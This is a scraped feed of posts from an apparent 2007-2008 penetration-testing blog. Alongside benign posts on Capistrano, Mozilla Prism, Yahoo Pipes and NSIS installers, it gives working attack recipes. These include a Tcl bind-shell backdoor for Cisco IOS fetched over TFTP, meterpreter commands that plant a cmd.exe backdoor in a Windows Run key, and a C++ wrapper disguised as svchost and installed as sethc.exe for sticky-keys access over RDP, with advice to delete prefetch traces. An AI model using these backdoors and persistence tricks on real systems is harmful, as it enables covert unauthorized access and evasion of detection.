do |menu|<br /> menu.layout = :one_line<br /><br /> menu.header = "Execute"<br /> menu.prompt = "Application? 
"<br /><br /> menu.choice :hello do <br /> helloworld <br /> end<br /> menu.choices(:skip, :exit) do <br /> Capistrano::CLI.ui.say("Choose not to run..") <br /> end<br /> end<br /> <br />end<br /><br />task :helloworld do<br /> run "echo helloworld."<br />end<br /></div>shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com1tag:blogger.com,1999:blog-26418619.post-64066878818050976932008-03-25T14:57:00.008+00:002008-03-25T15:44:44.277+00:00Mozilla Prism & Pen-testing<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://labs.mozilla.com/2007/10/prism/"><img style="float:right; margin:0 0 10px 10px; height:50%; width:50%; cursor:pointer; cursor:hand;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW3ZPF8aMJ-CtaFVP2EyW2rXjyANobK2eSHsTelagHkCR5hvckgyodDfr8jfLkl7iNJYKbfB-b8zg7HsYsou8i95VQ56Od0TQEsIcmALu30NcHvAT9XgTk8sCuKKNeI6G-_KO9/s400/prismlogo.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5181705439723623250" /></a><br /><a href="http://labs.mozilla.com/2007/10/prism/">Mozilla Prism </a>, one in a series of recent site-specific-browsers(ssb) has become a fairly useful tool for me. I can run the web applications under different users (run as.. ). This allows limiting access and resources to the web application. It also allows running multiple different cookie sets at one time. <br /><br />Simple example is having multiple gmail accounts logged in at one time. A more complex example is cookie manipulation while authenticated during access level enumeration.<br /><br />Prism allows for the fine tuning of ssb to accommodate multiple pentesting angles.In the past I've <a href="https://addons.mozilla.org/en-US/firefox/addon/2776">rebranded Firefox</a> and done similar things as running as guest users, but it was never this easy. 
<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://icontexto.blogspot.com/"><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhS4-5mahFw8c-kxkm5plXxfM_pSaWRr02f0BFIFDK_Y6kSHyXqdVmWyViA4oWNRRy3uXXtQbLZqgJgjrbtLq-UvDShNc5Q_bbE5Axu_3H3-oWVox2yO1I6MaAYdVvD-RzOIr1W/s400/Internet-48x48.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5181703064606708546" /></a><br /><br /><span style="font-weight:bold;">Prism and Flash on Windows</span><br />It is pretty simple to enable your plugins (not extensions) in Prism on Windows. Copy your {program files}\Mozilla Firefox\plugins directory to {program files}\Prism\Plugins; the Prism plugins directory doesn't exist by default and needs to be created. You may also want to copy the files into the XULRunner plugins directory, since XULRunner handles any XUL apps that depend on those plugins as well.shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com0tag:blogger.com,1999:blog-26418619.post-63580748856125819862007-11-28T16:36:00.000+00:002007-11-28T16:43:30.273+00:00Shell code for IOS using TCLSH on Cisco devices..A nice article from IRM describes a simple way to create a Tcl backdoor on Cisco IOS. 
You can read the white paper <a href="http://www.irmplc.com/download_pdf.php?src=Creating_Backdoors_in_Cisco_IOS_using_Tcl.pdf&force=yes">here</a>.<br />Oops: didn't know what I was sourcing..<br /><div id="code"><br />Router>en<br />Router#tclsh<br />Router(tcl)#source tftp://tftpserver/tclsh.tcl <br /></div><br />Source:<br /><div id="code"><pre>
# TclShell.tcl v0.1 by Andy Davis, IRM 2007
#
# IRM accepts no responsibility for the misuse of this code
# It is provided for demonstration purposes only
proc callback {sock addr port} {
    fconfigure $sock -translation lf -buffering line
    puts $sock " "
    puts $sock "-------------------------------------"
    puts $sock "TclShell v0.1 by Andy Davis, IRM 2007"
    puts $sock "-------------------------------------"
    puts $sock " "
    set response [exec "sh ver | inc IOS"]
    puts $sock $response
    set response [exec "sh priv"]
    puts $sock $response
    puts $sock " "
    puts $sock "Enter IOS command:"
    fileevent $sock readable [list echo $sock]
}
proc echo {sock} {
    global var
    if {[eof $sock] || [catch {gets $sock line}]} {
    } else {
        set response [exec "$line"]
        puts $sock $response
    }
}
set port 1234
set sh [socket -server callback $port]
vwait var
close $sh
</pre></div><br />All material is IRM's, this is just a snippet from the article.<br /><br />Two things worth noticing. The script is pulled in with source over TFTP, which has no authentication or integrity check, so whoever controls that server, or can spoof it on the path, runs arbitrary Tcl on the router at the privilege level of the session that typed tclsh; that is what the "oops" above is about. Once running, the listener on TCP 1234 hands an exec prompt to anyone who can reach it, with no authentication at all; an unexpected listening port in the output of show tcp brief is the thing to look for.shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com0tag:blogger.com,1999:blog-26418619.post-62174296705944623452007-11-19T15:15:00.000+00:002007-11-19T15:20:53.096+00:00Low hangin fruitHacking old skool windows..<br /><br />Notes from a CEH. Nothing new, but at least the basics are covered. This should all be automated by some wrapper so you don't waste time.. 
Generally you could do all this in Backtrack or similar builds.<br /><br /><a href="http://hackathology.blogspot.com/2007/06/hacking-old-skoolz-windows.html">http://hackathology.blogspot.com/2007/06/hacking-old-skoolz-windows.html</a>shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com0tag:blogger.com,1999:blog-26418619.post-62450724108069096082007-11-16T16:48:00.000+00:002007-11-16T19:51:59.077+00:00RSS / ATOM - Security Tagging Framework for Yahoo PIPES<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWvkyJ4zPT1v7VF91VbU0pW18Mzh2ynJlv-m4TrmpsI1y5H4VwatyASn59C6IlHLT6vSBALNlEWxk5U4x-FwoU__8azRcgtMRL5C2B0tsdPRY9Ol_hqy_FRAMNGxeFAoURFP0D/s1600-h/stfw.png"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWvkyJ4zPT1v7VF91VbU0pW18Mzh2ynJlv-m4TrmpsI1y5H4VwatyASn59C6IlHLT6vSBALNlEWxk5U4x-FwoU__8azRcgtMRL5C2B0tsdPRY9Ol_hqy_FRAMNGxeFAoURFP0D/s400/stfw.png" alt="" id="BLOGGER_PHOTO_ID_5133485745724896290" border="0" /></a><br /><br />I've been using Yahoo Pipes for a while to help filter some of the junk on full disclosure. 
Tagging became part of my daily habits, so I thought it most appropriate to create auto-taggers so I can read and filter much more quickly.<br /><br /><a href="http://pipes.yahoo.com/pipes/pipe.info?_id=jq8uEkfL2xGtHkF4mLokhQ">Security Tagging FrameWork<br /></a><br />The basics of the pipe: an array of regular expressions that strip unnecessary titles, duplicates and responses, and add pre-titles such as {Vulnerability}{Web-based}.<br /><br />I've also created an example of how to use the framework with existing Yahoo Pipes.<br /><br /><a href="http://pipes.yahoo.com/pipes/pipe.info?_id=8C4EuxCS3BGUPJaSLO2fWQ" class="pipelink">Vulnerability Watch++ (Security Tagging Framework Example)</a><br /><br />This pipe aggregates two feeds, de-duplicates them, and tags them using the framework twice.<br /><br />Side note:<br /><br />GNUCitizen posted two nice articles on Pipes and their flexibility when combined with a JSON database.<br /><br />1. <a href="http://www.gnucitizen.org/blog/5-generic-yahoo-pipes-hackers-cannot-live-without">5-generic-yahoo-pipes-hackers-cannot-live-without</a><br /><br />2. 
<a href="http://www.gnucitizen.org/projects/renaissance/">Project Renaissance</a>shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com0tag:blogger.com,1999:blog-26418619.post-10897043347212392002007-07-11T17:52:00.000+00:002007-07-11T17:55:39.491+00:00QRcode - semantic posting...<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjer9YIqMzlUPXC0Me_ecVzQJDZD0xfzqR-XZTRABhbMkmgPetZLh48RHMU5yhFNrN6bwlJoteCWxZFEVqnwY8snv5tL2xg41HCtDiJFkE8m-YcTvGR-u28yVzn0foNkhWDRN4r/s1600-h/shadowbq_robo2.png"><img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjer9YIqMzlUPXC0Me_ecVzQJDZD0xfzqR-XZTRABhbMkmgPetZLh48RHMU5yhFNrN6bwlJoteCWxZFEVqnwY8snv5tL2xg41HCtDiJFkE8m-YcTvGR-u28yVzn0foNkhWDRN4r/s400/shadowbq_robo2.png" alt="" id="BLOGGER_PHOTO_ID_5085999033002097986" border="0" /></a>Email: r@qry.jp<br /><br />QRcode decoding through the web... enjoy the robot.shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com2tag:blogger.com,1999:blog-26418619.post-51856422030373195332007-05-10T21:55:00.000+00:002007-05-15T14:02:20.959+00:00Building NSIS Installers for Large File DistributionsI've been working on some solutions recently to distribute large data sets made up of numerous groups of compressed files. I decided the best way to make this foolproof was to wrap an installer around them and do it "right". So here is how to do that with an installer.<br /><br />If you need to install, with only one setup application, two or more tar, bz2, gz, or lzma compressed files (for example multiple clustered files of over 2GB containing scientific data for your application, a couple of others containing the app, and maybe a required piece of library software like winpcap) you need a robust solution such as the Nullsoft Install System - <a href="http://www.nullsoft.com/free/nsis/">NSIS</a>. 
<br /><br />The most logical idea is to create a single file, but NSIS has a file size limit in its compiler, currently about 2GB. So deploying a package of, say, 8GB (something that would normally fit on a dual-layer DVD) is not possible with a standard single-file NSIS installer. This solution uses external plugins to decompress files that sit in the same directory as the installer, which lets you build large distributions delivered on large media or across gigabit-speed networks.<br /><br />Note that the .onInit check below only tests that each compressed_N.tar exists next to the setup executable; nothing verifies what is inside those archives, so whatever is placed there under those names gets unpacked and installed.<br /><br />Tools Req:<br /><br />7zip <a href="http://sourceforge.net/project/showfiles.php?group_id=14481&package_id=29413">[installer]</a> - Compression Utility<br />Notepad++ <a href="http://sourceforge.net/project/showfiles.php?group_id=95717&package_id=102072">[installer]</a> - IDE<br />NSIS <a href="http://sourceforge.net/project/showfiles.php?group_id=22049&package_id=15374">[installer]</a><br />UltraModernUI NSIS User Interface <a href="http://sourceforge.net/project/showfiles.php?group_id=146999&package_id=161955">[installer]</a> - personal choice of GUI for NSIS installer<br />Untgz Contrib plugin <a href="http://nsis.sourceforge.net/mediawiki/images/9/9d/Untgz.zip">[installer]</a> - Decompression library<br /><br />Files to Distribute:<br />compressed_1.tar<br />-- decomp_set1of5_file1of2.txt<br />-- decomp_set1of5_file2of2.txt<br />compressed_2.tar<br />-- decomp_set2of5_file1of3.txt<br />-- decomp_set2of5_file2of3.txt<br />-- decomp_set2of5_file3of3.txt<br />compressed_3.tar<br />-- decomp_set3of5_file1of2.txt<br />-- decomp_set3of5_file2of2.txt<br />compressed_4.tar<br />-- decomp_set4of5_file1of1.txt<br />compressed_5.tar<br />-- decomp_set5of5_file1of3.txt<br />-- decomp_set5of5_file2of3.txt<br />-- decomp_set5of5_file3of3.txt<br /><br /><div id="code"><font color="#7f7f7f" face="Times" size="3">1 <br />2 <br />3 <font color="#0000ff" face="Times">!include </font><font color="blue" face="Times">LogicLib.nsh 
</font><br />4 <br />5 <font color="blue" face="Times">Function .onInit</font><br />6 </font><font color="#007f00" face="Times" size="3"># Section Size must be manually set to the size of the required disk space NSIS will not do this for external files.</font><font color="#7f7f7f" face="Times" size="3"><br />7 </font><font color="#007f00" face="Times" size="3"># set required size of section number of kilobytes</font><font color="#7f7f7f" face="Times" size="3"><br />8 </font><font color="#007f00" face="Times" size="3"># 8gb to kilo bytes = 8,388,608</font><font color="#7f7f7f" face="Times" size="3"><br />9 </font><font face="Times" size="3">SectionSetSize <font color="#ff7f00" face="Times">${SecDecompress} </font><font color="#ff0000" face="Times">8388608</font></font><font color="#7f7f7f" face="Times" size="3"><br />10 <br />11</font><font color="#007f00" face="Times" size="3">;compressed_#.taz has be in the same directory as the Setup file.</font><font color="#7f7f7f" face="Times" size="3"><br />12</font><font color="#ff7f00" face="Times" size="3">${If} ${FileExists} <font color="#7f7f7f" face="Times">"</font>$EXEDIR<font color="#7f7f7f" face="Times">\compressed_1.tar"</font></font><font color="#7f7f7f" face="Times" size="3"><br />13</font><font color="#ff7f00" face="Times" size="3">${AndIf} ${FileExists} <font color="#7f7f7f" face="Times">"</font>$EXEDIR<font color="#7f7f7f" face="Times">\compressed_2.tar"</font></font><font color="#7f7f7f" face="Times" size="3"><br />14</font><font color="#ff7f00" face="Times" size="3">${AndIf} ${FileExists} <font color="#7f7f7f" face="Times">"</font>$EXEDIR<font color="#7f7f7f" face="Times">\compressed_3.tar"</font></font><font color="#7f7f7f" face="Times" size="3"><br />15 </font><font color="#ff7f00" face="Times" size="3">${AndIf} ${FileExists} <font color="#7f7f7f" face="Times">"</font>$EXEDIR<font color="#7f7f7f" face="Times">\compressed_4.tar"</font></font><font color="#7f7f7f" face="Times" size="3"><br />16 </font><font 
color="#ff7f00" face="Times" size="3">${AndIf} ${FileExists} <font color="#7f7f7f" face="Times">"</font>$EXEDIR<font color="#7f7f7f" face="Times">\compressed_5.tar"</font></font><font color="#7f7f7f" face="Times" size="3"><br />17 </font><font color="#0000ff" face="Times" size="3">Return</font><font color="#7f7f7f" face="Times" size="3"><br />18 </font><font color="#ff7f00" face="Times" size="3">${Else}</font><font color="#7f7f7f" face="Times" size="3"><br />19 </font><font color="#0000ff" face="Times" size="3">MessageBox <font color="#ff0000" face="Times">MB_OK</font><font color="blue" face="Times">|</font><font color="#ff0000" face="Times">MB_ICONINFORMATION </font><font color="#7f7f7f" face="Times">"This copy of the installer is missing a </font></font><font color="#7f7f7f" face="Times" size="3">compressed#.tar file.." <font color="#ff0000" face="Times">IDOK </font><font color="blue" face="Times">abort</font><br />20 </font><font face="Times" size="3">abort:</font><font color="#7f7f7f" face="Times" size="3"><br />21 </font><font face="Times" size="3">Banner::destroy</font><font color="#7f7f7f" face="Times" size="3"><br />22 </font><font color="#0000ff" face="Times" size="3">Abort</font><font color="#7f7f7f" face="Times" size="3"><br />23 </font><font color="#ff7f00" face="Times" size="3">${EndIf}</font><font color="#7f7f7f" face="Times" size="3"><br />24 <br />25 <font color="blue" face="Times">FunctionEnd</font><br />26 <br />27 <font color="#0000ff" face="Times">Section </font><font color="blue" face="Times">-decompress SecDecompress</font><br />28 <br />29 </font><font color="#007f00" face="Times" size="3">;UnTGZ Plugin</font><font color="#7f7f7f" face="Times" size="3"><br />30 </font><font color="#007f00" face="Times" size="3">;compressed_#.tar in this example is not compressed by gzip just tar collection </font><font color="#7f7f7f" face="Times" size="3"><br />31 </font><font color="#007f00" face="Times" size="3">; untgz plugin requires -znone to denote 
this</font><font color="#7f7f7f" face="Times" size="3"><br />32 <br />33 <font color="blue" face="Times">untgz::extract -j -d </font>"<font color="#ff7f00" face="Times">$INSTDIR</font>\" <font color="blue" face="Times">-znone</font>"<font color="#ff7f00" face="Times">$EXEDIR</font>\compressed_1.tar"<br />34 </font><font color="#ff7f00" face="Times" size="3">${If}${FileExists} <font color="#7f7f7f" face="Times">"</font>$INSTDIR<font color="#7f7f7f" face="Times">\decomp_set1of5_file1of2.txt"</font></font><font color="#7f7f7f" face="Times" size="3"><br />35 </font><font color="#ff7f00" face="Times" size="3">${AndIf} ${FileExists} <font color="#7f7f7f" face="Times">"</font>$INSTDIR<font color="#7f7f7f" face="Times">\decomp_set1of5_file2of2.txt"</font></font><font color="#7f7f7f" face="Times" size="3"><br />36 <font color="blue" face="Times">untgz::extract -j -d </font>"<font color="#ff7f00" face="Times">$INSTDIR</font>\" <font color="blue" face="Times">-znone</font>"<font color="#ff7f00" face="Times">$EXEDIR</font>\compressed_2.tar"<br />37 </font><font color="#ff7f00" face="Times" size="3">${AndIf} ${FileExists} <font color="#7f7f7f" face="Times">"</font>$INSTDIR<font color="#7f7f7f" face="Times">\decomp_set2of5_file1of3.txt"</font></font><font color="#7f7f7f" face="Times" size="3"><br />38 </font><font color="#ff7f00" face="Times" size="3">${AndIf} ${FileExists} <font color="#7f7f7f" face="Times">"</font>$INSTDIR<font color="#7f7f7f" face="Times">\decomp_set2of5_file2of3.txt"</font></font><font color="#7f7f7f" face="Times" size="3"><br />39 </font><font color="#ff7f00" face="Times" size="3">${AndIf} ${FileExists} <font color="#7f7f7f" face="Times">"</font>$INSTDIR<font color="#7f7f7f" face="Times">\decomp_set2of5_file3of3.txt"</font></font><font color="#7f7f7f" face="Times" size="3"><br />40 <font color="blue" face="Times">untgz::extract -j -d </font>"<font color="#ff7f00" face="Times">$INSTDIR</font>\" <font color="blue" face="Times">-znone</font>"<font 
color="#ff7f00" face="Times">$EXEDIR</font>\compressed_3.tar"<br />41 </font><font color="#ff7f00" face="Times" size="3">${AndIf} ${FileExists} <font color="#7f7f7f" face="Times">"</font>$INSTDIR<font color="#7f7f7f" face="Times">\decomp_set3of5_file1of2.txt"</font></font><font color="#7f7f7f" face="Times" size="3"><br />42 </font><font color="#ff7f00" face="Times" size="3">${AndIf} ${FileExists} <font color="#7f7f7f" face="Times">"</font>$INSTDIR<font color="#7f7f7f" face="Times">\decomp_set3of5_file2of2.txt"</font></font><font color="#7f7f7f" face="Times" size="3"><br />43 <font color="blue" face="Times">untgz::extract -j -d </font>"<font color="#ff7f00" face="Times">$INSTDIR</font>\" <font color="blue" face="Times">-znone</font>"<font color="#ff7f00" face="Times">$EXEDIR</font>\compressed_4.tar"<br />44 </font><font color="#ff7f00" face="Times" size="3">${AndIf} ${FileExists} <font color="#7f7f7f" face="Times">"</font>$INSTDIR<font color="#7f7f7f" face="Times">\decomp_set4of5_file1of1.txt"</font></font><font color="#7f7f7f" face="Times" size="3"><br />45 <font color="blue" face="Times">untgz::extract -j -d </font>"<font color="#ff7f00" face="Times">$INSTDIR</font>\" <font color="blue" face="Times">-znone</font>"<font color="#ff7f00" face="Times">$EXEDIR</font>\compressed_5.tar"<br />46 </font><font color="#ff7f00" face="Times" size="3">${AndIf} ${FileExists} <font color="#7f7f7f" face="Times">"</font>$INSTDIR<font color="#7f7f7f" face="Times">\decomp_set5of5_file1of3.txt"</font></font><font color="#7f7f7f" face="Times" size="3"><br />47 </font><font color="#ff7f00" face="Times" size="3">${AndIf} ${FileExists} <font color="#7f7f7f" face="Times">"</font>$INSTDIR<font color="#7f7f7f" face="Times">\decomp_set5of5_file2of3.txt"</font></font><font color="#7f7f7f" face="Times" size="3"><br />48 </font><font color="#ff7f00" face="Times" size="3">${AndIf} ${FileExists} <font color="#7f7f7f" face="Times">"</font>$INSTDIR<font color="#7f7f7f" 
face="Times">\decomp_set5of5_file3of3.txt"</font></font><font color="#7f7f7f" face="Times" size="3"><br />49 </font><font color="#0000ff" face="Times" size="3">Goto <font color="blue" face="Times">EverythingOk</font></font><font color="#7f7f7f" face="Times" size="3"><br />50 </font><font color="#ff7f00" face="Times" size="3">${Else}</font><font color="#7f7f7f" face="Times" size="3"><br />51 <font color="#0000ff" face="Times">MessageBox </font><font color="#ff0000" face="Times">MB_OK</font><font color="blue" face="Times">|</font><font color="#ff0000" face="Times">MB_ICONEXCLAMATION </font>"Installation Failure. Media may be corrupt." <font color="#ff0000" face="Times">IDOK</font></font><font face="Times" size="3">abort</font><font color="#7f7f7f" face="Times" size="3"><br />52 </font><font face="Times" size="3">abort:</font><font color="#7f7f7f" face="Times" size="3"><br />53 </font><font face="Times" size="3">Banner::destroy</font><br /><font color="#7f7f7f" face="Times" size="3">54 </font><font color="#0000ff" face="Times" size="3">Abort</font><font color="#7f7f7f" face="Times" size="3"><br />55 </font><font color="#ff7f00" face="Times" size="3">${EndIf}</font><font color="#7f7f7f" face="Times" size="3"><br />56 </font><font face="Times" size="3">EverythingOK:</font><font color="#7f7f7f" face="Times" size="3"><br />57 <br />58 </font><font color="#007f00" face="Times" size="3">;If tar files were packaged into the setup you can delete it like this :)</font><font color="#7f7f7f" face="Times" size="3"><br />59 </font><font color="#007f00" face="Times" size="3">;Delete "$INSTDIR\compressed#.taz"</font><font color="#7f7f7f" face="Times" size="3"><br />60 <br />61 <font color="#0000ff" face="Times">SectionEnd</font></font><br /></div>shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.comtag:blogger.com,1999:blog-26418619.post-77779462824172818272007-04-03T16:03:00.000+00:002007-04-03T19:30:40.413+00:00Session redirect in php and aspThese are 
examples of correct ways to handle access checks and redirects in sessions in ASP (1.0|VBS) & PHP.. I don't know how many times I see this done wrong.. <br /><span style="font-weight:bold;"><br />ASP example</span><br /><div id="code"><%<br />If NOT Session("Authenticated") = 1 Then<br /> Response.Redirect ("login.asp")<br /> 'Response.Redirect ("login.asp", true) '<= This is the same as the default<br /> 'Exit ' <= This is implied by the default True argument above<br />End If<br />%></div><br /><br /><br /><span style="font-weight:bold;">PHP Example</span><br /><div id="code"><?php<br /> session_start(); /* $_SESSION is empty until the session is started */<br /> if ($_SESSION['access'] != "yes")<br /> { header("Location: login.php"); /* Redirect browser */<br /> exit; /* Make sure that code below does not get executed when we redirect. */<br /> }<br /> // Code following should not be executed unless authenticated.<br /> echo ("secure code");<br />?></div><br /><br />Note: since PHP 4.4.2 and PHP 5.1.2, header() refuses to send more than one header at a time, as protection against header injection attacks.shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com2tag:blogger.com,1999:blog-26418619.post-83223673652757126612007-03-30T20:52:00.000+00:002007-05-14T13:52:58.154+00:00Month of ... bugs1. Month of browser bugs<br />2. Month of apple bugs<br />3. Month of kernel bugs<br />4. Month of PHP bugs<br />5. Month of MySPACE bugs<br /><br />eh.. ergg.. cough.. die. this fad is getting old.. 
I hate even commenting on this at all.shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com1tag:blogger.com,1999:blog-26418619.post-40737548889802539912007-03-28T22:09:00.000+00:002007-04-03T14:55:05.527+00:00Setting and Confirming reg keys w/meterpreter.super quick meterpreter sequence<br />Prep<br /><div id="code">upload c:\\sbdbg.exe c:\\windows\\system32\\</div><br /><br />Set<br /><div id="code">reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v NotSecurityIssueYourLookingFor -d "C:\\windows\\system32\\sbdbd.exe -l -p 4337 -a 127.0.0.1 -e cmd.exe -r0"</div><br /><br />Verify<br /><div id="code">reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run<br />reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v NotSecurityIssueYourLookingFor</div><br /><br />Use<br /><div id="code">(reboot)</div>shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com0tag:blogger.com,1999:blog-26418619.post-85345353939087061662007-03-23T05:16:00.000+00:002007-03-23T05:34:56.915+00:00Comparing Common Vulnerability Result SetsOne of the major things I've been working on is bringing together vulnerability result information. I found that it was a major pain in the ass to remove duplicate entries from result sets. I was finally able to come up with a listing based on CVE / BID tracking numbers:<br /><br />An example mapping file could look like this<br /><br />Tenable Nessus 3.0 - to - Harris Guardian Scanner <a href="http://shadowbq.googlepages.com/Nessus_to_Harris.txt">[download txt]</a><br /><br />Just extracting Nessus information can be a huge problem. Because of the lack of structure within the NASL scripting language, there are many, many variations on the output generated by the plugins. 
I've made some additional changes to an old tool.<br /><br />nessus_extract.pl (version 1.7) <a href="http://www.answorld.com/nessus_extract.pl">[download perl]</a><br /><br />I added pipes into the fray, generating a recursive-style CSV to separate BID and CVE numbers, as well as a more robust double-quote word qualifier. <br /><br />One huge help is the Open Source Vulnerability Database (OSVDB), which has come a long way.shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com1tag:blogger.com,1999:blog-26418619.post-88814600138431060002007-03-15T21:06:00.001+00:002007-03-23T04:10:52.041+00:00Pentest Order of Objects..ISSAF was used in conjunction with the latest BackTrack release.<br />Although it is not my company's standard, it is quite close.<br /><br />Not to be too open.. but this has led to a really good idea for object-oriented coding.<br /><br />Information Systems Security Assessment Framework (ISSAF) draft 0.2<br /><span style="font-weight: bold;">ASSESSMENT </span><br /><br /><span style="font-style: italic;">INFORMATION GATHERING </span><br />-Archive<br />-DNS<br />-Route<br />-SMTP<br />-Search engine<br />-Survey<br />-Whois<br /><span style="font-style: italic;">NETWORK MAPPING</span><br />-Identify Live Hosts<br />-OS Fingerprinting<br />-Port scanning<br />-Service Fingerprinting<br />-Identify Border Assets<br />-(SNMP - MIB Browsing)<br />-(VPN)<br />-Web/Public Application Mapping (Crawling)<br /><span style="font-style: italic;">VULNERABILITY IDENTIFICATION </span><br />-(Cisco)<br />-Database<br />-Fuzzers<br />-SMB Analysis<br />-SNMP Analysis<br />-Security Scanner<br />-Web Analysis<br /><span style="font-style: italic;">PENETRATION </span><br />-Exploits (Metasploit)<br /><span>-Exploits (CoreImpact / Canvas)<br />-Exploits (milw0rm / SecurityFocus)</span><span style="font-style: italic;"><br />GAINING ACCESS AND PRIVILEGE ESCALATION </span><br />-Password Attacks<br />-Default Conf Attacks<br />
-Sniffers<br />-Spoofing<br /><span style="font-style: italic;">ENUMERATING FURTHER </span><br />-Management Infrastructure (i.e. WMI, SNMP, CDP)<br />-Pull Passwords (hashes, SAM files)<br />-Privileged Assessment (Repeat all Steps)<br /><span style="font-style: italic;">COMPROMISE REMOTE USERS/SITES</span><br />-Targeted Phishing<br />-DNS Poisoning<br /><span style="font-style: italic;">MAINTAINING ACCESS</span><br />-Covert Channels<br />-Rootkits<br />-Port knocking<br />-Proxy<br />-Tunnels<br /><span style="font-style: italic;">COVER THE TRACKS</span><br />-House Cleaningshadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.com2tag:blogger.com,1999:blog-26418619.post-54491630490275782642007-03-13T15:51:00.001+00:002007-03-15T19:57:54.470+00:00SBD as netcat<div xmlns='http://www.w3.org/1999/xhtml'>Yeah so I rattle off some SBD stuff sometimes.. I'm referring to the netcat clone called sbd. SBD is Shadowinteger's Backdoor, located @ <a href='http://tigerteam.se/dl/sbd/'>http://tigerteam.se/dl/sbd/</a>. This is my preferred "swiss army knife" because of its default configuration of encryption (AES-CBC-128 + HMAC-SHA1) and dangerous execution binding (-e command). 
<br /><br />Netcat and its NC clones:<br /><ul><li>netcat - "swiss army knife"</li><li><a href='http://tigerteam.se/dl/sbd/'>sbd & sbdbg.exe</a> - shadowinteger's backdoor</li><li><a href='http://www.deepspace6.net/projects/netcat6.html'>netcat6</a> - swiss army knife+ for IPv6</li><li><a href='http://www.farm9.org/Cryptcat/'>cryptcat</a> - netcat with twofish encryption</li><li><a href='http://www.dest-unreach.org/socat/'>socat</a> - multipurpose relay (netcat++) with IPv6/SSL. Example usage: <br />socat TCP6-LISTEN:8080,reuseaddr,fork PROXY:proxy:www.domain.com:80</li></ul>Simpler tools:<br /><ul><li><a href='http://xfocus.net/tools/200601/nc.pl'>nc.pl</a> - perl netcat-like implementation</li><li><a href='http://www-user.tu-chemnitz.de/%7Euro/software/netcopy/netcopy.c'>netcopy</a> - receiver</li><li><a href='http://www-user.tu-chemnitz.de/%7Euro/software/netcopy/netsend.c'>netsend</a> - transmitter for netcopy</li><li><a href='http://www-user.tu-chemnitz.de/%7Euro/software/netcopy/urocat.c'>urocat</a> - simple cat clone</li></ul>None of this is news.. I just wanted to point out some of this simple stuff.</div>shadowbqhttp://www.blogger.com/profile/01373471954866816522noreply@blogger.comtag:blogger.com,1999:blog-26418619.post-56990270141027631302007-03-08T19:57:00.001+00:002007-03-12T15:03:27.043+00:00sbd fun as a rootkit via sethc.exe<span style="font-weight:bold;">SBD Fun</span><br /><br />Transferring files<br /><div id="code">RCV: sbd -l -p 4337 > outputfile<br />XMIT: cat infile | sbd 127.0.0.1 4337 -q 10</div><br /><br />Transferring files through .tar.gz<br /><div id="code">RCV: sbd -l -p 4337 | tar xvfpz -<br />XMIT: tar zcfp - /path/to/directory | sbd -w 3 127.0.0.1 4337</div><br /><br />Port scan: <br /><div id="code">echo EXIT | sbd -v -w 1 127.0.0.1 20-250 500-600 5990-7000</div><br /><br /><span style="font-weight:bold;">Using Cmd.exe to bind to service</span><br />In my experience this is flaky at best.. 
<br /><br />Create, then start, the service:<br /><div id="code">sc create testsvc binpath= "cmd /K start" type= interact<br />sc start testsvc</div><br /><br />Note that this time, the SC START immediately creates a new CMD window, even if the original CMD window failed to start with error 1053 (this is expected since CMD.EXE doesn't have any service related code in it).<br /><br />When the SCM starts a service it expects the service to call the RegisterServiceCtrlHandler API.<br /><br />We may want to fix any C program to actually handle the correct calls if loading them as a legitimate service.<br /><br /><span style="font-weight:bold;">Simple C++ sbd wrapper</span><br />(Rename sbdbg.exe to svchost in this example.)<br /><div id="code">#include <cstdlib><br />#include <iostream><br /><br />using namespace std;<br /><br />int main(int argc, char *argv[])<br />{<br /> // Let's restrict the address to localhost only.. pls.<br /> system("c:\\tmp\\svchost.exe -l -p 4337 -a 127.0.0.1 -e cmd.exe -r0");<br /> return EXIT_SUCCESS;<br />}</div><br /><br /><span style="font-weight:bold;">Rootkit portion</span><br />Rename output binary to sethc.exe .. works ok.<br /><br /><span style="font-weight:bold;">Prefetch restrictions.</span><br />Remember to delete any existing sethc.exe files in c:\windows\prefetch prior to use. <br /><br /><span style="font-weight:bold;">Interesting Note about RDC</span><br />Sticky Keys [left-shift x5] (sethc.exe) works through Remote Desktop Connections (RDC/RDP). Funny how suddenly that makes this all the more interesting.<br /><br /><span style="font-weight:bold;">Apparently the SYSTEM kernel security shuts down all unknown processes in a sweep @5 minutes into the session.</span><br /><br />Could there be a fake handler for WM_CLOSE? 
